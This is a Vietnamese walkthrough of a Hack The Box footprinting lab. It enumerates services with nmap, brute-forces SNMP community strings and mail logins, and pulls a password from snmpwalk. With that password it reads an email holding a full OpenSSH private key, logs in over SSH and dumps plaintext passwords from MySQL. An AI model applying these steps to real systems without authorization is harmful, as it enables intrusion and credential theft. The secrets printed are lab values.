Footprinting Lab
November 4, 2025
•
September 23, 2025
•
Hard
Author
Hung Nguyen Tuong
Hung Nguyen TuongInitial Reconnaissance
Service Scanning (TCP)
┌──(hungnt㉿kali)-[~/Documents]
└─$ sudo nmap -sV -sC -v 10.129.202.20
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
|_pop3-capabilities: PIPELINING UIDL SASL(PLAIN) RESP-CODES USER STLS CAPA TOP AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: LITERAL+ IMAP4rev1 more SASL-IR OK capabilities post-login STARTTLS LOGIN-REFERRALS have ENABLE AUTH=PLAINA0001 listed ID IDLE Pre-login
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: LITERAL+ IMAP4rev1 more OK capabilities post-login SASL-IR LOGIN-REFERRALS have ENABLE AUTH=PLAINA0001 listed ID IDLE Pre-login
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL(PLAIN) PIPELINING USER CAPA UIDL TOP RESP-CODES
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Issuer: commonName=NIXHARD
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-11-10T01:30:25
| Not valid after: 2031-11-08T01:30:25
| MD5: 2b45:ec3c:508f:3cfb:9f6a:750c:63f8:2077
|_SHA-1: ed43:7d5a:3c46:54ac:9902:8dc4:9d86:6efb:2ae3:357c
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTừ kết quả scan, ta thấy dịch vụ SSH đang chạy tại port 22, cũng như POP3, IMAP chạy tại port 110, 143, và tại port 993, 995 với TLS.
Nmap Scripts
Vì hiện tại chúng ta chưa có bất kỳ credentials nào nên không thể đăng nhập vào các dịch vụ email được. Chúng ta sẽ thử chạy các nmap scripts để brute-force các username hợp lệ:
┌──(hungnt㉿kali)-[~/Documents]
└─$ sudo nmap -p110,143,993,995 --script=imap-brute,pop3-brute -v 10.129.202.20
PORT STATE SERVICE
110/tcp open pop3
| pop3-brute:
| Accounts: No valid accounts found
| Statistics: Performed 21 guesses in 65 seconds, average tps: 0.5
|_ ERROR: The service seems to have failed or is heavily firewalled...
143/tcp open imap
|_imap-brute: ERROR: Script execution failed (use -d to debug)
993/tcp open imaps
| imap-brute:
| Accounts: No valid accounts found
| Statistics: Performed 25 guesses in 151 seconds, average tps: 0.5
|_ ERROR: The service seems to have failed or is heavily firewalled...
995/tcp open pop3s
| pop3-brute:
| Accounts: No valid accounts found
| Statistics: Performed 17 guesses in 77 seconds, average tps: 0.4
|_ ERROR: The service seems to have failed or is heavily firewalled...Tuy nhiên, chúng ta không thu được kết quả gì.
Bây giờ, không còn bất kỳ hướng đi nào để tiếp tục với các dịch vụ mà ta đã scan ở trên. Không lẽ chúng ta mắc kẹt ở đây? Nhớ rằng, ta mới chỉ scan các TCP port, chưa scan các UDP port. Vậy, chúng ta sẽ tiếp tục theo hướng này.
Service Scanning (UDP)
┌──(hungnt㉿kali)-[~/Desktop]
└─$ sudo nmap -sV -sU -v -F 10.129.69.62
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
161/udp open snmp net-snmp; net-snmp SNMPv3 serverỞ đây, ta thấy dịch vụ đáng chú ý nhất là SNMP đang chạy.
SNMP 161 (UDP)
Ta có thể sử dụng onesixtyoneđể brute-force community strings:
┌──(hungnt㉿kali)-[~/Desktop]
└─$ onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt 10.129.69.62
Scanning 1 hosts, 3219 communities
10.129.69.62 [backup] Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64Ta tìm được một community strings là backup, đồng thời biết phiên bản kernel của hệ điều hành linux.
Tiếp tục, ta có thể sử duinjg snmp-check để trích xuất các thông tin quan trọng như thông tin hệ thống, users, local ports,…
┌──(hungnt㉿kali)-[~/Desktop]
└─$ snmp-check 10.129.69.62 -p 161 -c backup
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.129.69.62:161 using SNMPv1 and community 'backup'
[*] System information:
Host IP address : 10.129.69.62
Hostname : NIXHARD
Description : Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
Contact : Admin <tech@inlanefreight.htb>
Location : Inlanefreight
Uptime snmp : 00:18:36.29
Uptime system : 00:18:29.91
System date : 2025-9-25 00:23:04.0Nhưng ở đây ta chỉ lấy ra được thông tin về hệ thống. Vậy thì ta sẽ sử dụng snmpwalk để xem còn gì khác mà snmp-check không đưa ra:
┌──(hungnt㉿kali)-[~/Desktop]
└─$ snmpwalk -v2c -c backup 10.129.69.62
Tại đây, ta phát hiện một cặp username và password của tom:
tom NMds732Js2761Có vẻ như tom đang cố gắng đổi password của mình nhưng không thành công.
Chúng ta sẽ thử SSH vào máy target với tài khoản của tom:
Tuy nhiên, dịch vụ SSH không cho phép xác thực bằng mật khẩu, mà yêu cầu xác thực bằng key pair. Vậy chúng ta sẽ thử đăng nhập vào những dịch vụ POP3 và IMAP.
┌──(hungnt㉿kali)-[~/Documents]
└─$ openssl s_client -connect 10.129.69.62:pop3s
...
read R BLOCK
+OK Dovecot (Ubuntu) ready.
USER tom
+OK
PASS NMds732Js2761
+OK Logged in.
LIST
+OK 1 messages:
1 3661
.
RETR 1
RENEGOTIATING
ERROR
4047C7FE857F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2892:Với POP3S, dù đăng nhập thành công và list được các messages, chúng ta không thể đọc được bởi vì lỗi wrong ssl version. Trước khi thay đổi phiên bản ssl để fix lỗi này, thì chúng ta hãy cứ thử đăng nhập vào IMAP trước.
IMAPS 993
Với IMAPS, ta đăng nhập thành công và có thể đọc các email:
┌──(hungnt㉿kali)-[~/Documents]
└─$ openssl s_client -connect 10.129.69.62:imaps
...
read R BLOCK
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot (Ubuntu) ready.
A1 LOGIN tom NMds732Js2761
A1 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in
A1 LIST "" *
* LIST (\HasNoChildren) "." Notes
* LIST (\HasNoChildren) "." Meetings
* LIST (\HasNoChildren \UnMarked) "." Important
* LIST (\HasNoChildren) "." INBOX
A1 OK List completed (0.003 + 0.000 + 0.002 secs).
A1 SELECT Important
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509062] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
A1 OK [READ-WRITE] Select completed (0.003 + 0.000 + 0.002 secs).
A1 UNSELECT Important
A1 OK Unselect completed (0.001 + 0.000 secs).
A1 SELECT Notes
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509065] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
A1 OK [READ-WRITE] Select completed (0.009 + 0.000 + 0.008 secs).
A1 UNSELECT Notes
A1 OK Unselect completed (0.001 + 0.000 secs).
A1 SELECT Meetings
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509063] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
A1 OK [READ-WRITE] Select completed (0.013 + 0.000 + 0.012 secs).
A1 UNSELECT Meetings
A1 OK Unselect completed (0.001 + 0.000 secs).
A1 SELECT INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509064] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
A1 OK [READ-WRITE] Select completed (0.001 + 0.000 secs).
A2 FETCH ALL
A2 BAD Error in IMAP command FETCH: Invalid arguments (0.001 + 0.000 secs).
A2 FETCH 1:* ALL
* 1 FETCH (FLAGS (\Seen) INTERNALDATE "10-Nov-2021 01:44:26 +0000" RFC822.SIZE 3661 ENVELOPE ("Wed, 10 Nov 2010 14:21:26 +0200" "KEY" ((NIL NIL "MISSING_MAILBOX" "MISSING_DOMAIN")) ((NIL NIL "MISSING_MAILBOX" "MISSING_DOMAIN")) ((NIL NIL "MISSING_MAILBOX" "MISSING_DOMAIN")) ((NIL NIL "tom" "inlanefreight.htb")) NIL NIL NIL NIL))
A2 OK Fetch completed (0.006 + 0.000 + 0.005 secs).
A3 FETCH 1 BODY[]
* 1 FETCH (BODY[] {3661}
HELO dev.inlanefreight.htb
MAIL FROM:<tech@dev.inlanefreight.htb>
RCPT TO:<bob@inlanefreight.htb>
DATA
From: [Admin] <tech@inlanefreight.htb>
To: <tom@inlanefreight.htb>
Date: Wed, 10 Nov 2010 14:21:26 +0200
Subject: KEY
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
)
A3 OK Fetch completed (0.001 + 0.000 secs).Tại đây, ta phát hiện ra một OpenSSH private key, và key này có thể thuộc về tom bởi vì email này được gửi đến tom:
To: <tom@inlanefreight.htb>Shell as tom
Chúng ta copy private key này và SSH vào máy target:
Chúng ta để ý ngay rằng, tom thuộc trong group mysql qua lệnh id:
tom@NIXHARD:~$ id
uid=1002(tom) gid=1002(tom) groups=1002(tom),119(mysql)Và file .mysql_history trong thư mục home của tom cho thấy lịch sử lệnh truy vấn trước đó, có vẻ như là truy vấn từ table users trong database users:
tom@NIXHARD:~$ ls -la
total 48
drwxr-xr-x 6 tom tom 4096 Nov 10 2021 .
drwxr-xr-x 5 root root 4096 Nov 10 2021 ..
-rw------- 1 tom tom 532 Nov 10 2021 .bash_history
-rw-r--r-- 1 tom tom 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 tom tom 3771 Nov 10 2021 .bashrc
drwx------ 2 tom tom 4096 Nov 10 2021 .cache
drwx------ 3 tom tom 4096 Nov 10 2021 mail
drwx------ 8 tom tom 4096 Sep 25 01:02 Maildir
-rw------- 1 tom tom 169 Nov 10 2021 .mysql_history
-rw-r--r-- 1 tom tom 807 Nov 10 2021 .profile
drwx------ 2 tom tom 4096 Nov 10 2021 .ssh
-rw------- 1 tom tom 2018 Nov 10 2021 .viminfo
tom@NIXHARD:~$ cat .mysql_history
_HiStOrY_V2_
show\040databases;
select\040*\040from\040users;
use\040users;
select\040*\040from\040users;
show\040databases;
use\040users;
select\040*\040from\040users;MySQL Enumeration
Chúng ta thử đăng nhập vào dịch vụ MySQL với credentials này tom NMds732Js2761 và trích xuất password của HTB:
tom@NIXHARD:/$ mysql -u tom -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 9
Server version: 8.0.27-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| users |
+--------------------+
5 rows in set (0.02 sec)
mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)
mysql> select * from users limit 5;
+------+------------+-------------+
| id | username | password |
+------+------------+-------------+
| 1 | ppavlata0 | 6znAfvTbB2 |
| 2 | ktofanini1 | TP2NxFD62e |
| 3 | rallwell2 | t1t7WaqvEfv |
| 4 | efernier3 | ZRYOBO9PI |
| 5 | fpoon4 | 5Spyx2Jb |
+------+------------+-------------+
5 rows in set (0.00 sec)
mysql> select * from users where username = 'HTB';
+------+----------+------------------------------+
| id | username | password |
+------+----------+------------------------------+
| 150 | HTB | cr3n4o7rzse7rzhnckhssncif7ds |
+------+----------+------------------------------+
1 row in set (0.00 sec)